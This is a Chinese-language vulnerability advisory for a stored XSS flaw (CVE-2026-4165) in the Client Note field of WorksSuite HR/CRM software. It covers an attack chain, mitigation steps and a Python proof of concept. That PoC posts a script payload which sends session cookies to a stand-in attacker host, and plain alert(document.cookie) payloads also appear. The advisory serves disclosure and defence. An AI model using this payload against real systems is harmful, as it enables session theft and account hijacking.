CVE-2026-4165: WorksSuite HR/CRM/项目管理平台 Client Note参数XSS漏洞

漏洞信息

漏洞编号

CVE-2026-4165

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

WorksSuite HR, CRM and Project Management

漏洞概述

CVE-2026-4165是WorksSuite HR, CRM and Project Management产品中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于/account/orders/create功能的Client Note参数中，攻击者可以通过在订单创建页面提交恶意JavaScript脚本实现持久化的XSS攻击。由于该参数未对用户输入进行充分的输入验证和输出编码，恶意脚本会被存储在服务器端，当其他用户访问相关页面时，脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面内容。由于该漏洞需要高权限用户才能利用，且需要用户交互触发，因此CVSS评分仅为2.4（低危）。该漏洞已于2026年3月16日公开披露，漏洞利用代码已公开。

技术细节

漏洞位于WorksSuite HR, CRM and Project Management的订单创建功能模块。具体来说，/account/orders/create端点中的Client Note参数存在存储型XSS漏洞。攻击者通过在该参数中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>），由于应用程序未对用户输入进行HTML实体编码或输入过滤，该脚本会被永久存储在数据库中。当管理员或其他用户访问订单列表或订单详情页面时，浏览器会解析并执行存储的恶意脚本。由于需要高权限（PR:H）才能创建订单，且攻击需要诱导其他用户访问触发点（UI:R），虽然攻击复杂度较低（AC:L），但实际利用需要一定的社会工程。攻击者可利用此漏洞窃取用户会话令牌、执行未授权操作或进行进一步的攻击。

攻击链分析

STEP 1

步骤1

攻击者获取WorksSuite高权限账户（如管理员或销售经理）

STEP 2

步骤2

访问/account/orders/create订单创建页面

STEP 3

步骤3

在Client Note参数中注入恶意XSS payload，如<script>alert(document.cookie)</script>

STEP 4

步骤4

提交订单，恶意脚本被存储在数据库中

STEP 5

步骤5

诱导其他用户（如系统管理员）访问订单列表或详情页面

STEP 6

步骤6

受害者浏览器执行存储的恶意脚本，攻击者窃取会话Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-4165 PoC - WorksSuite XSS in Client Note parameter
# Target: /account/orders/create

def exploit_xss(target_url, username, password):
    """
    Exploit Stored XSS in Client Note parameter
    """
    login_url = f"{target_url}/login"
    order_url = f"{target_url}/account/orders/create"
    
    # XSS payload - Cookie stealing example
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    
    # Step 1: Login to get session
    session = requests.Session()
    login_data = {
        'email': username,
        'password': password
    }
    
    response = session.post(login_url, data=login_data)
    
    if response.status_code != 200:
        print("[-] Login failed")
        return False
    
    # Step 2: Create order with XSS payload in Client Note
    order_data = {
        'client_note': xss_payload,
        # Other required fields...
    }
    
    response = session.post(order_url, data=order_data)
    
    if response.status_code == 200:
        print("[+] XSS payload submitted successfully")
        print("[*] Payload stored in order creation")
        print("[*] Trigger when admin views orders")
        return True
    else:
        print("[-] Failed to submit payload")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2026-4165.py <target_url> <username> <password>")
        sys.exit(1)
    
    exploit_xss(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

WorksSuite HR, CRM and Project Management <= 5.5.25

防御指南

临时缓解措施

在修复补丁发布前，可采取以下临时措施：1) 限制低权限用户创建订单的功能；2) 在Web应用前端对Client Note字段进行输入过滤，移除script标签和事件处理器属性；3) 对所有输出到HTML的内容进行HTML实体编码；4) 监控日志中的可疑XSS攻击特征；5) 启用HttpOnly和Secure标志保护Cookie；6) 考虑临时禁用订单创建功能直到官方补丁发布。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4165
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4165
3 Details https://www.cvedetails.com/cve/CVE-2026-4165/
4 VulDB https://vuldb.com/cve/CVE-2026-4165
5 Link https://vuldb.com/?ctiid.351072
6 Link https://vuldb.com/?id.351072
7 Link https://vuldb.com/?submit.769430